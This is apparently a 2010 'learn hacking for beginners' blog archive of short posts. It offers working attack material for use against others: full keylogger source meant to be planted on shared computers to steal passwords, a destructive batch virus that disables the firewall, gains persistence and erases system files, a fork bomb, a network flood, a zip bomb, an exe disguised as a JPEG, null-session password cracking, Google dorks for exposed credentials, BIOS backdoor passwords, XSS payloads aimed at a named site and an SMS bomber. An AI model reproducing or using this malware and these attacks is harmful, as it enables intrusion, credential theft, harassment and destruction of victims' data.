Showing posts with label LEARN HACKING - FOR BEGINNERS. Show all posts
Showing posts with label LEARN HACKING - FOR BEGINNERS. Show all posts

Friday, November 19, 2010

Super Hide IP 3.0.6.2 (Portable)


Super Hide IP 3.0.6.2 (Portable)


Super Hide IP 3.0.6.2 Portable | 6 MB



Do you know what your IP address means? Are you aware that your IP address is exposed every time you visit a website? Many websites and hackers use IP address to monitor your home address and other personal information. Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you.

Super Hide IP allows you to surf anonymously, keep your IP address hidden, protect your personal information against hackers and provide full encryption of your online activity, all with a simple click of a button.

Key Features:

Anonymous Web Surfing
Click Hide IP button and you will be assigned fake IP addresses, preventing others from getting your true IP when surfing the Internet.

Protect Your Identity
Surf anonymously to prevent hackers or identity thieves from monitoring your web activity or intercepting your personal information such as your financial information.

Choose IP Country
You can select to use fake IP from different countries via "Choose IP Country" option and can Check IP directly.

Send Anonymous E-mails
Hide your IP in E-mail headers. Be protected while sending e-mails via Yahoo!, Hotmail, GMail.
Un-ban Yourself from Forums and Restricted Websites

Use Super Hide IP to change your IP which allows you to access any forums or websites that has ever banned you.

Download


Hotfile
http://hotfile.com/dl/83535378/af56acd/Super_Hide_IP.rar.html

Friday, October 15, 2010

How To Use pen Drive Even If It is Locked in Colleges, Offices Etc.

. By Disabling USB Ports from Device Manager
i) Go to Start > Run, in run prompt type “devmgmt.msc” and press enter.

ii) Go to Universal Serial bus Controller. See if there are any red colored cross? If yes, right click and enable those USB Ports.


Now try and use the pen drive.

2. Correct Registry Value for USB Mass Storage device

i) Go to Start > Run , type “regedit” and press enter.

ii) Navigate to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR

iii) Double-click on the “Start” key to modify its value, change the value to 3 and press OK.
Now remove and connect the pen drive again, it should work fine, else its driver are missing

Thursday, October 14, 2010

Task Manager, Regedit and Folder Options Disabled by Virus ??

All must be aware of this problem caused by a virus called “Brontok”. Sometimes after removing the virus completely from our system, you’ll still face some problems such as you can no longer bring up Windows Task Manager from CTRL+ALT+DEL. You get the error message saying “Task Manager has been disabled by your administrator....









If You think that it’s easy to fix this problem by going to Registry Editor, you can’t! You'll get a error message “Registry editing has been disabled by your administrator”.









Folder Options and even Show Hidden Files & Folder is disabled! How frustrating! Don’t worry, here’s how to restore your Windows Task Manager, Registry Editor, Folder Options and Show hidden files & folders.

Brontok virus will make some changes to the system restrictions in order to hide itself from easy detection and also from easy cleaning.

Here’s a free tool called Remove Restrictions Tool (RRT) which is able to re-enables all what the virus had previously disabled, and gives you back the control over your own computer.


Remove Restrictions Tool is able to re-enable:
- Registry Tools (regedit)
- Ctrl+Alt+Del
- Folder Options
- Show Hidden Files

Small and easy to use. Make sure you boot in to Safe Mode to use Remove Restrictions Tool (RRT).

http://rapidshare.com/files/79783905/RRT.exe

Wednesday, October 13, 2010

sms bombing

Application to send multiple SMS messages .at same instant.. so be carefull using it

itzz used to flood/spam any number.you can send almost any amount of messages instantly.i m using it to desturb my friends.

your messages should be unlimited or it may cost you.

for  android phones go to android market from your cell phone and search for text flooder.then install it.
(100 % working tested)or here

for symbian based phones dowload sms flooder from here

Monday, October 11, 2010

How To Find Vulnerable Web Apps With Google : Web Application Hacking

Search engines index a huge number of web pages and other resources. Hackers can use these engines to make anonymous attacks, find easy victims, and gain the knowledge necessary to mount a powerful attack against a network. Search engines are dangerous largely because users are careless. Further, search engines can help hackers avoid identification. Search engines make discovering candidate machines almost effortless. Listed here are a few common hacks performed with http://www.google.com (which is our favorite search engine, but you can use one of your own choosing if you'd like, assuming it supports all the same features as Google).

To find unprotected /admin, /password, /mail directories and their content, search for the following keywords in http://www.google.com:
  • "Index of /admin"
  • "Index of /password"
  • "Index of /mail"
  • "Index of /" +banques +filetype:xls (for France)
  • "Index of /" +passwd
  • "Index of /" password.txt













To find password hint applications that are set up poorly, type the following in http://www.google.com (many of these enumerate users, give hints for passwords, or mail account passwords to an e-mail address you specify!):
  • password hint
  • password hint -email
  • show password hint -email
  • filetype:htaccess user







To find IIS/Apache web servers with FrontPage installed, type the following in http://www.google.com (run the encrypted password files through a password cracker and get access in minutes!):

         administrators.pwd index
         authors.pwd index
          service.pwd index
          allinurl:_vti_bin shtml.exe




To find the MRTG traffic analysis page for websites, type the following in http://www.google.com:
  • inurl:mrtg







To get access to unprotected global.asa(x) files or to get juicy .NET information, type the following in http://www.google.com:
  • filetype:config web (finds web.config)
  • global.asax index (finds global.asax or global.asa)






To find improperly configured Outlook Web Access (OWA) servers, type the following in http://www.google.com:
  • inurl:exchange inurl:finduser inurl:root

Sunday, October 10, 2010

How To hack A Computer In A LAN By Creating a Null Session

Today,I will write about hacking computer inside the LAN network.

This technique will be taking advantage of Port 139.

Most of the time,Port 139 will be opened.

First of all,I will do a port scanning at the target computer which is 192.168.40.128.

This computer is inside my LAN network.

I will scan it using Nmap.



I get the result and it shows Port 139 is opened up for me.

Now you will need both of these tools:
** USER2SID & SID2USER
** NetBios Auditing Tool

You can get both of them on the Internet.

After you get both of them,put them in the C:\ directory



You now need to create a null session to the target computer.



Now open the Command Prompt and browse to the USER2SID & SID2USER folder.There will be 2 tools inside it,one will be USER2SID and another one will be SID2USER.

We will first using USER2SID to get the ID.



We will test against the Guest account because Guest account is a built in account.

After we get the ID,we need to do some modification on the ID.

We take the ID we get from the guest account and modified it become
"5 21 861567501 1383384898 839522115 500".

Please leave out the S-1-,leave out all the - too.



Now you will see that you get the username of the Administrator account.

In this case,the Administrator account is Administrator.

Create a text file called user.txt and the content will be the username of the Admin account.



Prepare yourself a good wordlist.

  

Now put both of them in the same directory with the NetBios Auditing Tool.




Press on enter and the tool will run through the passlist.





In this case,I have get the password.

In order to proof that I can get access to the target computer using this password.



After you press enter,it will prompt you for the username and password.



Therefore,just input them inside the prompt and continue.



Target C drive will be on your screen.






In order to prevent from this attack,close down port that you do not want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139

Saturday, October 9, 2010

How To Hide Your Malicious Code Into A Simple Scrap Document

Malicious code (also called vandals) is a new breed of Internet threat that cannot be efficiently controlled by conventional antivirus software alone. In contrast to viruses that require a user to execute a program in order to cause damage, vandals are auto-executable applications

As Very understood, a simple user would not Open Any malicious file untill or unless he is forced or Phished to do so.
Therefore, Here is The way How to Create a Malicious code Within an scrap document so that A SImple user Cannot Identify It.
  1. Make a copy of Notepad.exe and place it on your desktop.
  2. Open Wordpad.
  3. Click and drag the copy of Notepad.exe you placed on the desktop into the open Wordpad document.
  4. Next, click on Edit, Package Object, Edit Package.
  5. Then click on Edit, Command Line.
  6. At the command-line prompt, type a command such as dir c: /p; then click on OK.
  7. You can now change the icon if so desired.
  8. Exit from the edit window, and the document will be updated.
  9. Click and drag Notepad.exe back to the desktop.
  10. The file will have taken the name Scrap; rename it ImportantMessage.txt.
  11. Click on ImportantMessage.txt and observe the results. You should notice that the scrap produced a directory listing of the C drive. If you were a malicious hacker, you could have just as easily set up the command to reformat the hard drive or erase all the system files.
 

Friday, October 8, 2010

How To Byepass BIOS Passwords

Introduction to BIOS Passwords

The best method to reset a BIOS password depends on what BIOS the computer has. Common BIOS's include AMI, Award, IBM and Phoenix. Numerous other BIOS's do exist, but these are the most common.
Some BIOS's allow you to require a password be entered before the system will boot. Some BIOS's allow you to require a password to be entered before the BIOS setup may be accessed.
The general categories of solutions to reset a BIOS password are:
  • Using a Backdoor BIOS Password
  • Resetting the BIOS Password using Software
  • Resetting the BIOS Password using Hardware
  • Vendor Specific Solutions for resetting the BIOS Password

 

 

 







Using a Backdoor BIOS Password

Some BIOS manufacturers implement a backdoor password. The backdoor password is a BIOS password that works, no matter what the user sets the BIOS password to. These passwords are typically used for testing and maintenance. Manufacturers typically change the backdoor BIOS passwords from time to time.

AMI Backdoor BIOS Passwords

Reported AMI backdoor BIOS passwords include A.M.I., AAAMMMIII, AMI?SW , AMI_SW, BIOS, CONDO, HEWITT RAND, LKWPETER, MI, and PASSWORD.

Award Backdoor BIOS Passwords

One reported Award backdoor BIOS password is eight spaces. Other reported Award backdoor BIOS passwords include 01322222, 589589, 589721, 595595, 598598 , ALFAROME, ALLY, ALLy, aLLY, aLLy, aPAf, award, AWARD PW, AWARD SW, AWARD?SW, AWARD_PW, AWARD_SW, AWKWARD, awkward, BIOSTAR, CONCAT, CONDO, Condo, condo, d8on, djonet, HLT, J256, J262, j262, j322, j332, J64, KDD, LKWPETER, Lkwpeter, PINT, pint, SER, SKY_FOX, SYXZ, syxz, TTPTHA, ZAAAADA, ZAAADA, ZBAAACA, and ZJAAADC.

Phoenix Backdoor BIOS Passwords

Reported Phoenix BIOS backdoor passwords include BIOS, CMOS, phoenix, and PHOENIX.

Backdoor BIOS Passwords from Other Manufacturers

Reported BIOS backdoor passwords for other manufacturers include:
ManufacturerBIOS Password
VOBIS & IBMmerlin
DellDell
BiostarBiostar
CompaqCompaq
Enoxxo11nE
Epoxcentral
FreetechPosterie
IWilliwill
Jetwayspooml
Packard Bellbell9
QDIQDI
SiemensSKY_FOX
SOYOSY_MB
TMCBIGO
ToshibaToshiba
Remember that what you see listed may not be the actual backdoor BIOS password, this BIOS password may simply have the same checksum as the real backdoor BIOS password. For Award BIOS, this checksum is stored at F000:EC60.

Resetting the BIOS Password using Software

Every system must store the BIOS password information somewhere. If you are able to access the machine after it has been booted successfully, you may be able to view the BIOS password. You must know the memory address where the BIOS password is stored, and the format in which the BIOS password is stored. Or, you must have a program that knows these things.
You can write your own program to read the BIOS password from the CMOS memory on a PC by writing the address of the byte of CMOS memory that you wish to read in port 0x370, and then reading the contents of port 0x371.
!BIOS will recover the BIOS password for most common BIOS versions, including IBM, American Megatrends Inc, Award and Phoenix.
CmosPwd will recover the BIOS password for the following BIOS versions:
  • ACER/IBM BIOS
  • AMI BIOS
  • AMI WinBIOS 2.5
  • Award 4.5x/4.6x/6.0
  • Compaq (1992)
  • Compaq (New version)
  • IBM (PS/2, Activa, Thinkpad)
  • Packard Bell
  • Phoenix 1.00.09.AC0 (1994), a486 1.03, 1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06 rev 1.13.1107
  • Phoenix 4 release 6 (User)
  • Gateway Solo - Phoenix 4.0 release 6
  • Toshiba
  • Zenith AMI

Resetting the BIOS Password using Hardware

If you cannot access the machine after if has been powered up, it is still possible to get past the BIOS password. The BIOS password is stored in CMOS memory that is maintained while the PC is powered off by a small battery, which is attached to the motherboard. If you remove this battery, all CMOS information (including the BIOS password) will be lost. You will need to re-enter the correct CMOS setup information to use the machine. The machines owner or user will most likely be alarmed when it is discovered that the BIOS password has been deleted.
On some motherboards, the battery is soldered to the motherboard, making it difficult to remove. If this is the case, you have another alternative. Somewhere on the motherboard you should find a jumper that will clear the BIOS password. If you have the motherboard documentation, you will know where that jumper is. If not, the jumper may be labeled on the motherboard. If you are not fortunate enough for either of these to be the case, you may be able to guess which jumper is the correct jumper. This jumper is usually standing alone near the battery. If you cannot locate this jumper, you might short both of the points where the battery connects to the motherboard.
If all else fails, you may have to clear the BIOS password by resetting the RTC (Real Time Clock) IC (Integrated Circuit) on your motherboard.
Many RTC's require an external battery. If your RTC is one of this type, you can clear the BIOS password just by unsocketing the RTC and reseating it.
RTC's which require external batteries include:








Most RTC chips with integrated batteries can be reset to clear the BIOS password by shorting two pins together for a few seconds.
You will see more than one option for some chips due to testing by various people in the field. Remember to remove power from the system before shorting these pins.
RTC ChipPins
Dallas DS1287ATI benchmarq bp3287AMT3 (N.C.) and 21 (NC/RCL)
Chips & Technologies P82C20612 (GND) and 32 (5V)-or-74 (GND) and 75 (5V)
OPTi F82C2063 and 26
Dallas Semiconductor DS12887A3 (N.C.) and 21 (RCLR)
You should be able to discover how to reset the BIOS password stored in most RTC (Real Time Clock) chips by reading the manufacturers data sheet for that RTC. Some RTC's, like the Dallas DS1287 and TI benchmarq bq3287mt cannot be cleared. The solution to resetting the BIOS password on systems with those RTC's is to purchase a replacement RTC chip.

Tuesday, October 5, 2010

hacking passwords using keylogger


To hack any ones account just download the following software and double click on it .it will get installed on your computer.the  thing it  do is..... whatever user will type on keyboard all will be saved in a file called log.txt which is a text file ..means passwords will also be saved whenever user log in using internet.remember that log.txt will be saved there where you will keep virus file(the file you have downloaded).you can install this software in cyber cafes or in your college ,school computers by which you can hack many email ids..if u face any problem comment below.......

to create your own keylogger use following method...

                                      first download dev c++ from here

                                       How to install DevC++ and run .cpp file



                                             Launch Dev C++ ,
                                             Click on File-> New-> Project



Choose empty project, type name of project for example hackosys and select C++ Project



Right click on project name and click New File



after this will appear field where you should type code , to execute code click on Execute->Compile & Run or press F9

code 

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
 void Stealth();
 int main()
 {
 Stealth();
 char i;
 while (1)
 {
 for(i = 8; i <= 190; i++)
 {
 if (GetAsyncKeyState(i) == -32767)
 Save (i,"LOG.txt");
 }
 }
 system ("PAUSE");
 return 0;
 }
 /* *********************************** */
 int Save (int key_stroke, char *file)
 {
 if ( (key_stroke == 1) || (key_stroke == 2) )
 return 0;
 FILE *OUTPUT_FILE;
 OUTPUT_FILE = fopen(file, "a+");
 cout << key_stroke << endl;
 if (key_stroke == 8)
 fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
 else if (key_stroke == 13)
 fprintf(OUTPUT_FILE, "%s", "\n");
 else if (key_stroke == 32)
 fprintf(OUTPUT_FILE, "%s", " ");
 else if (key_stroke == VK_TAB)
 fprintf(OUTPUT_FILE, "%s", "[TAB]");
 else if (key_stroke == VK_SHIFT)
 fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
 else if (key_stroke == VK_CONTROL)
 fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
 else if (key_stroke == VK_ESCAPE)
 fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
 else if (key_stroke == VK_END)
 fprintf(OUTPUT_FILE, "%s", "[END]");
 else if (key_stroke == VK_HOME)
 fprintf(OUTPUT_FILE, "%s", "[HOME]");
 else if (key_stroke == VK_LEFT)
 fprintf(OUTPUT_FILE, "%s", "[LEFT]");
 else if (key_stroke == VK_UP)
 fprintf(OUTPUT_FILE, "%s", "[UP]");
 else if (key_stroke == VK_RIGHT)
 fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
 else if (key_stroke == VK_DOWN)
 fprintf(OUTPUT_FILE, "%s", "[DOWN]");
 else if (key_stroke == 190 || key_stroke == 110)
 fprintf(OUTPUT_FILE, "%s", ".");
 else
 fprintf(OUTPUT_FILE, "%s", &key_stroke);
 fclose (OUTPUT_FILE);
 return 0;
 }
 /* *********************************** */
 void Stealth()
 {
 HWND Stealth;
 AllocConsole();
 Stealth = FindWindowA("ConsoleWindowClass", NULL);
 ShowWindow(Stealth,0);
 }

now execute this code


The content in this article is presented for educational purposes only
if you face any problem regarding tutorial then do write to us...

Friday, October 1, 2010

shroom virus code..

 .I will not be responsible for any damages .
PROCEDURE TO CREATE THIS VIRUS

========================
Open Notepad and copy paste the code provided below and save it as(use "save as" option) anynames.bat (ex. hackosys.bat) after saving don't open it on your computer or your system will be deleted and then will shutdown as the commands says. Use this virus on your Enemy Not on your friends..

Code:
start
color 5
title Your ----ed, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now ----ed :D
msg * You got owned! :o
msg * Say Bye to your computer n00b
msg * hackosys.blogspot.com
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP

Wednesday, September 29, 2010

Reveal *****---Asterisk--- Passwords

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.


javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox.

The ZIP of Death

This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.

1) Make a.txt file

2) Open and type the null character (alt + 255)

3) Press ctrl + a then ctrl + v a couple times to make some null bytes

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

5) Now make several copies of a.txt and name accordinly

6) Open cmd.exe

7) Type copy /b *.txt b.txt

8) Now every copy is made into a super copy and repeat

9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!

The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555

Just add some more and the file will expand amazingly

Make sure to not open this after

You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

Creating IM Bot

This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients.
To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”.


If you like to write a personal IM bot, just follow these simple steps:-
Step 1: Go to www.imified.com and register a new account with a bot.
Step 2: Now it’s time to create a bot which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.
Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.
<?php
switch ($_REQUEST['step']) {
case 1:
echo "Hi, what's your name?";
break;
case 2:
echo "Hi " . $_REQUEST['value1'] . ", where do you live?";
break;
case 3:
echo "Well, welcome to this hello world bot, " . $_REQUEST['value1'] . "<br>from " . $_REQUEST['value2'] . ".<reset>";
break;
}
?>
Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.
Step 4: Now login to your imified account, paste the script URL

Step 5: Add that im bot your friends list. That’s it.
This is a very basic bot but the possibilities are endless.

Sunday, September 26, 2010

XSS Cross Site Scripting Attack

I though to demonstrate another type of website hacking attack called Cross Site Scripting attack,a.k.a. XSS. XSS vulnerabilities occur due to weak coding of the web applications. Once the hacker finds this vulnerability he/she injects malicious codes(Usually in web forms) to steal session cookies and later the hacker uses those cookies to gain access to sensitive page content.
Xss Cross Site Scripting may be classified in two types:
1.Persistent XSS
2.Non Persistent XSS
In order to demonstrate a XSS attack I will take an example of a website:
http://www.redwrappings.co.in/
Checking the venerability
The simplest way to check the vulnerability is to enter the following code in the any web form present on the website
<script>alert(“XSS”)</script>
xss cross site scripting
Once the attacker inserts the code A dialog box like the below one will appear:
Defacement
Now the attacker has found that the website is velnerable to an xss attack the attacker can do lots of damages to the website, The most common thing which the attacker will do is place his defacement image on that page showing that the website is hacked, For this purpose he will insert a code similar to the below one:
<html><body><IMG SRC=”http://site.com/yourDefaceIMAGE.png”></body></html>
Where http://site.com/yourDefaceIMAGE.png is the defacement image
Inserting Flash Videos
The attacker can also insert flash videos by entering the following code in any web form present on the website
Redirection
The attacker can also redirect the page to any particular page , In case if the hacker has managed to find XSS venerability in the a website like paypal.com or alertpay.com he can redirect that page to a Phisher Site(Fake login page) where the victim will loose his password, To redirect a an xssed page to another page the attacker will insert a code similar to the below one:
<script>window.open( “http://www.google.com/” )</script>
Stealing Cookies
Most of the attackers after finding a website venerable to xss will probably steal victims cookies to gain access to their account or private data this method is called Session hijacking, which is a detailed topic and I will be explaining in the later articles
Hope you have learned some XSS ,Feel free to ask if you have any problem regarding the above information

Saturday, September 25, 2010

How to Enable or Disable Hibernation in Windows 7

Enable Hibernation

Enabling or Disabling the “Hibernate” option in Windows 7 or Vista is not as simple as it used to be in Windows XP. For Windows 7 a different approach has to be followed to accomplish the same job. In this post you will find how to enable or disable the Hibernate option in Windows 7.
Hibernation is a power saving option which was designed primarily for laptops. Unlike “sleep mode” which puts the open documents and files into the memory, hibernation puts all the open files and documents on to the hard disk and shuts down the computer without drawing even a small amount of power. Thus hibernation becomes an excellent way to save power and resume Windows back to the state where it was left off. If you really want to use this feature on Windows 7 then you need to enable this option. This can be done as follows.
1. Open the Command Prompt with “Administrator rights”. To do so, type cmd in Start menu and then hit Ctrl+Shift+Enter.
2. Now type the following command in the command prompt and hit Enter.
powercfg /hibernate on
3. Type exit and hit Enter to close the Command Prompt. Now you should see the “Hibernate” option in the Start menu. If not then perform the following steps.
A. Type Power Options in the Start menu and hit Enter.
B. In the left pane, open the link labeled “Change when the computer sleeps” and then open the link “Change advanced power settings”.
Now a small window will pop-up as shown below:
C. Now expand the Sleep tree and turn off Allow Hybrid Sleep as shown in the above screenshot.
D. Now you should see the Hibernate option in the Start menu.

Monday, September 13, 2010

Types of virus

Virus are classifed mainly on based on what they affect & how, size.


Based on what they effect.

1.Computer virus.
2.Mobile virus -Nowerdays many virus are written for mobile They spread through gprs/bluetooth.
3.Music player virus -There exsists only a handful of such virus.Theu spread when you add a song /video or dwnload some thing

Based on size

•Tiny virii - These are under 500 bytes. They are designed to be undetectable due to their small size. TINY is one such virus. They generally very simple because their code length is so limited.
•Large Virus- They are over 1,500 bytes. They are designed to be undetectable because they cover their tracks very well (all that code DOES have a use!). The best example of this is the Whale virus, which is perhaps the best 'stealth' virus in existence. •Other virus- These virus are easily detectable. Many virus are of this type.

Based on How they effect

All these many seam like compurt virus only but that is only partly true as your mobile too has an OS.

•Boot Sector Virus: This virus replaces or implants itself in the boot sector---an area of the hard drive (or any other disk) accessed when you first turn on your computer. This kind of virus can prevent you from being able to boot your hard disk.
•File Virus: This infects your applications. These then spread the virus by infecting other applications. You need to run or open these files.
•Macro Virus: These account for about 75 percent of viruses found in the wild. They are written using a simplified macro programming language, these viruses affect Microsoft Office applications, such as Word and Excel, and . A document infected with a macro virus generally modifies a pre-existing, commonly used command (such as Save) to trigger its payload upon execution of that command.
•Multipartite Virus: These infects both files and the boot sectorthat infect your system dozens of times before it's caught.
•Polymorphic Virus: A well written virus of this type is usually difficult for antivirus scanners to detect but these are usually not that well written. They changes code whenever it passes to another machine.
•Stealth Virus: These hides its presence by making an infected file not appear infected, but doesn't usually stand up to antivirus software.

<!--199a7bf0ff1b425f8670f4f00421746b-->
<!--03909001b799489bbd4f7e6dde8301aa-->

Convert Exe to JPEG

Converting EXE to some other format say JPEG is easier than you think. This will not physically convert the exe file to jpeg. All that this does is this will trick someone including your OS to some extend in thinking that it's a jpeg file and thus opening/running the exe file. Ok i will use firefox.exe to show how you do it.


Create a new folder and copy the firefox.exe file into it. Now just create a shortcut of the file in the same folder. This shortcut is going to be the image(jpeg). Rename the shortcut to say, viruswriting.jpeg and original so vir.jpeg

remember these 2 files (original and shortcut) have to be in the same folder

Now right click on the shortcut and delete the "Start in" field. Change th e target field to C:\WINDOWS\system32\cmd.exe /c vir.jpeg.


Now you need to change the icon of the shortcut file and the job is done. This trick is mainly for those who run their own server.This way when ever the person opens the shortcut the exe file will execute .


Note that both files have to be in the same folder and the user has to click on the shortcut and not on the original file. So if you are sending this to someone place both in the same folder and compress it . Now send the .zip or .rar file

Change Files extentions of all files at once

In order to corrupt files all that we do is change files to non-working TXT files or some other format.


REN *.EXE *.TXT

REN *.COM *.TXT

REN *.BAT *.TXT

REN *.LNK *.TXT



Just copy the above code into a Notepad file and save it .BAT This is not it You can even change files to any other extension like


*.JPEG *.DOC

*.COM means all files with extension .COM. Ren is a dos command to rename. The above cde just renames all . .COM files to .TXT.

Saturday, September 11, 2010

How to crash your computer

Just go to notepad (start>all programs>accessories>notepad) and type exactly this script between the lines:


@echo off:crashstartgoto crash
 
goto file>save as>crash.bat


and save! But remember when you open this file command prompt windows will open until the computer crashes or freezes so it would be better if you placed this on a friend's or the school's computers
 
There are different scripts that you can write in notepad to get a batch file with similar reactions
 
To recover your desktop  from this just directly pull the plugs from your PC and put the plugs back in and start it up again or just hold the power button on your PC until it turns off and restart again.

Flood your network

This is the virus writing basics section. Today we are going to show you on flodding the network. This is demonstrated using Dos/Batch programming.

The below cade will temporarily flood network once the user turns off his comp everything will be back to normal.

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

Just copy the code into a notepad file and save it as anything.bat. When you run it will start flodding your network.

As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly.